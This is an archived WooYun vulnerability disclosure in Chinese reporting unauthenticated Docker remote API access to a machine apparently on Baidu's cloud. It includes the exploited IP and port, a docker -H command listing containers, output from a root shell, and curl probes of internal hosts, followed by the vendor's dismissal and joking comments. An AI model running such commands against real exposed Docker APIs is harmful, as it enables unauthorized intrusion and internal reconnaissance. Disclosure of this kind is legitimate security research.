当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0209509

漏洞标题:新姿势之获取百度机器root权限

相关厂商:百度

漏洞作者: 黑客,绝对是黑客

提交时间:2016-05-17 03:05

修复时间:2016-05-17 11:41

公开时间:2016-05-17 11:41

漏洞类型:

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-17: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

请允许我再刷一个~
什么时候有first blood效果
预告!drops分析文章即将发布

详细说明:

docker remote api未授权访问

http://180.76.161.55:2375


查看运行的容器

docker -H tcp://180.76.161.55:2375 ps
CONTAINER ID        IMAGE                                                                COMMAND                  CREATED             STATUS              PORTS                    NAMES
d294b4eed64f        registry.bae.bj.baidubce.com/public/ubuntu12.04_web_php5.5:6653-91   "/usr/bin/tini -- /us"   7 weeks ago         Up 7 weeks          0.0.0.0:8888->8080/tcp   grave_williams
e6ba8c1ca7e8        swarm                                                                "/swarm join --advert"   7 weeks ago         Up 7 weeks          2375/tcp                 sick_lichterman


域名证明为百度

registry.bae.bj.baidubce.com


拿root权限,过程请参考之后发布的drops文章
ifconfig

root@wjl-test-2-1:~# ifconfig
docker0   Link encap:Ethernet  HWaddr 02:42:df:68:95:78
          inet addr:172.17.0.1  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:dfff:fe68:9578/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:933462 errors:0 dropped:0 overruns:0 frame:0
          TX packets:889024 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:77456385 (77.4 MB)  TX bytes:119620987 (119.6 MB)
eth0      Link encap:Ethernet  HWaddr fa:16:3e:75:d9:b9
          inet addr:192.168.2.189  Bcast:192.168.255.255  Mask:255.255.0.0
          inet6 addr: fe80::f816:3eff:fe75:d9b9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1400  Metric:1
          RX packets:13544982 errors:0 dropped:0 overruns:0 frame:0
          TX packets:11278565 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2681279156 (2.6 GB)  TX bytes:2649540661 (2.6 GB)


registry.bae.bj.baidubce.com内网ip 10.16.83.153

root@wjl-test-2-1:~# ping registry.bae.bj.baidubce.com
PING registry.bae.bj.baidubce.com (10.16.83.153) 56(84) bytes of data.
64 bytes from 10.16.83.153: icmp_req=1 ttl=61 time=0.300 ms
64 bytes from 10.16.83.153: icmp_req=2 ttl=61 time=0.314 ms
64 bytes from 10.16.83.153: icmp_req=3 ttl=61 time=0.274 ms


经过测试发现与
WooYun: 一不小心走进了百度内网
漏洞在同一网段

root@wjl-test-2-1:~# curl 10.16.83.164:8080
     __          _     __
    / /_  ____ _(_)___/ /_  __      _________  _____
   / __ \/ __ `/ / __  / / / /_____/ ___/ __ \/ ___/
  / /_/ / /_/ / / /_/ / /_/ /_____/ /  / /_/ / /__
 /_.___/\__,_/_/\__,_/\__,_/     /_/  / .___/\___/
                                     /_/
User Manual : http://wiki.baidu.com/display/RPC
/status : Status of services
/connections : List all connections
/flags : List all gflags
  /flags/port : List the gflag
  /flags/guard_page_size;help* : List multiple gflags with glob patterns (Use $ instead of ? to match single character)
  /flags/NAME?setvalue=VALUE : Change a gflag, validator will be called. User is responsible for thread-safety and consistency issues.
/vars : List all exposed bvars
  /vars/rpc_num_sockets : List the bvar
  /vars/rpc_server*_count;iobuf_blo$k_* : List multiple bvars with glob patterns (Use $ instead of ? to match single character)
/rpcz : Recent RPC calls(disabled)
  /rpcz/stats : Statistics of rpcz
  /rpcz?time=2016/05/17-00:05:28 : RPC calls before the time
  /rpcz?time=2016/05/17-00:05:28&max_scan=10 : N RPC calls at most before the time
  Other filters: min_latency, min_request_size, min_response_size, log_id, error_code
  /rpcz?trace=N : Recent RPC calls whose trace_id is N
  /rpcz?trace=N&span=M : Recent RPC calls whose trace_id is N and span_id is M
/hotspots/cpu : Profiling CPU (disabled)
/hotspots/heap : Profiling heap (disabled)
/hotspots/growth : Profiling growth of heap (disabled)
curl -H 'Content-Type: application/json' -d 'JSON' 10.63.28.21:8002/ServiceName/MethodName : Call method by http+json
/version : Version of this server, set by Server::set_version()
/health : Test healthy
/vlog : List all VLOG callsites
/sockets : Check status of a Socket
/bthreads : Check status of a bthread
/ids : Check status of a bthread_id
/protobufs : List all protobuf services and messages
/list : json signature of methods
/threads : Check pstack (disabled)
/dir : Browse directories and files (disabled)


root@wjl-test-2-1:~# curl 10.16.83.151
[cf971f2d3a042b53308e9696d4923bdb] Not allowed to access builtin services, try ServerOptions.internal_port=8222 instead if you're inside Baidu's network


已证明,不再深入

漏洞证明:

修复方案:

版权声明:转载请注明来源 黑客,绝对是黑客@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-17 11:41

厂商回复:

赞这个提交!很cool,但是,但是,经过我们排查,这个漏洞非百度及开放云漏洞。我们开放云的客户在虚机上使用了BAE公共docker镜像搭建了docker服务来测试,并且开启了remote api,却没有认证!客户说,这个只是他的测试帐号,明天将会重装,允许我们提前忽略来配合drops文章的发布,非常期待!

最新状态:

2016-05-17:至于10.16.83.X,该段设计之初就是暴露给北京region的云上租户虚机,提供的都是公共服务。如果发现公共服务存在漏洞,欢迎通过BSRC或者WooYun报告给我们。

漏洞评价:

评价

  1. 2016-05-17 05:25 | Mel0d6y ( 路人 | Rank:12 漏洞数:4 | 从零单排系列,上天梯,涨姿势。)

    黑阔,绝对是黑阔

  2. 2016-05-17 05:45 | Brother ( 实习白帽子 | Rank:71 漏洞数:19 )

    小号,绝对是小号

  3. 2016-05-17 06:12 | prolog ( 普通白帽子 | Rank:757 漏洞数:151 )

    小号,绝对是小号

  4. 2016-05-17 06:21 | 7路公交老司机 ( 路人 | Rank:10 漏洞数:1 | 摇滚救不了中国人)

    卧槽。。看了眼洞主的漏洞列表,太黑客啦,绝对是黑客

  5. 2016-05-17 07:23 | Mark0smith ( 普通白帽子 | Rank:162 漏洞数:65 | 我要是再正常一点就好了)

    审核大大辛苦了,3点还在审核洞

  6. 2016-05-17 07:46 | 暴走 ( 普通白帽子 | Rank:611 漏洞数:106 | 专心补刀。)

    大牛,绝对是大牛

  7. 2016-05-17 08:25 | _Thorns ( 普通白帽子 | Rank:1712 漏洞数:261 | 自从上了乌云,身体一天不如一天了!)

    来势汹汹。

  8. 2016-05-17 08:38 | Sunshie ( 实习白帽子 | Rank:107 漏洞数:30 | http://phpinfo.meฏ๎๎๎๎๎๎๎๎๎๎...)

    id可以..

  9. 2016-05-17 08:39 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1393 漏洞数:147 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    牛逼,绝对牛逼.

  10. 2016-05-17 08:40 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    大牛,绝对是大牛

  11. 2016-05-17 08:49 | luwikes ( 普通白帽子 | Rank:552 漏洞数:83 | 潜心学习~~~)

    霸气,绝对霸气

  12. 2016-05-17 08:57 | 凌晨G度 ( 路人 | Rank:7 漏洞数:2 | 充实的麦穗都是低着头,倒是那些空壳却昂着...)

    小号,绝对是小号

  13. 2016-05-17 09:03 | 十万伏特 ( 路人 | Rank:2 漏洞数:1 | Hello 乌云)

    黑客,绝对是黑客

  14. 2016-05-17 09:14 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    这逼装得 满分。

  15. 2016-05-17 09:30 | Orvilla ( 路人 | Rank:4 漏洞数:1 | 菜逼来学习)

    黑客,绝对是黑客

  16. 2016-05-17 09:35 | E.M ( 路人 | Rank:4 漏洞数:1 | 过来打我啊。。。。)

    溜得不要不要的

  17. 2016-05-17 09:51 | 小川 认证白帽子 ( 核心白帽子 | Rank:1587 漏洞数:237 | 一个致力要将乌云变成搞笑论坛的男人)

    我已经准备好为你点赞哦

  18. 2016-05-17 10:26 | xiaoyu. ( 路人 | Rank:0 漏洞数:2 | xiaoyu)

    黑客,绝对是黑客;;;;

  19. 2016-05-17 10:29 | loli 认证白帽子 ( 普通白帽子 | Rank:649 漏洞数:59 | 每个男人心中都住着一个叫小红的88号技师。)

    牛逼

  20. 2016-05-17 10:33 | 少宇 ( 实习白帽子 | Rank:32 漏洞数:13 | QQ :1126179674 By : 少宇 http://www.90...)

    小号,绝对是小号,人家刷洞,你刷雷

  21. 2016-05-17 11:19 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    骚,绝对是骚